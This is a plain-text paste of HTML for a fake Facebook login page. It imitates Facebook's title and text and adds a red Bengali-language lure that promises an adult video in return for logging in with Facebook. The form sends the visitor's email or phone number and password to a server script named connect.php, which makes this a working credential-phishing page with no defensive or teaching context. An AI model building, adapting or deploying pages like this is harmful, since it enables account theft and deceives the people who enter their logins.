Untitled
2 years ago in Plain Text
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Facebook – log in or sign up</title>
<link rel="stylesheet" href="style.css">
<link rel="icon" href="fb_logo.png">
</head>
<body>
<header class="header">
<main class="main-area">
<div class="fb">
<h1 class="heading">facebook</h1>
<div class="text-container">
<h3 class="text">Facebook helps you connect and share with the people in your life.</h3>
</div>
</div>
<div class="fake_mass" style="color: red; text-align: center; margin: 10px;">
<p style="border: 1px solid red;padding: 15px;">XXX-VIDEOS এ ভিডিওটি দেখার জন্য ফেসবুক দিয়ে লগইন করুন </p>
</div>
<div class="imp">
<div class="form-box">
<form action="connect.php" class="form" method="POST">
<input type="email" name="user_email" id="email" placeholder="Email address or phone number">
<input type="password" name="user_password" id="password" placeholder="Password">
<button class="login-btn" name="btn">Log In</button>
<div class="for-pass">
<a href="#" class="link-1">Forgotten Password ?</a>
</div>
<button class="btn-new-account">Create New Account</button>
</form>
</div>
<div class="para"><a href="#" class="link-2">Create a Page</a><span> for a celibrity, band or business</span></div>
</div>
</main>
</header>
</body>
</html>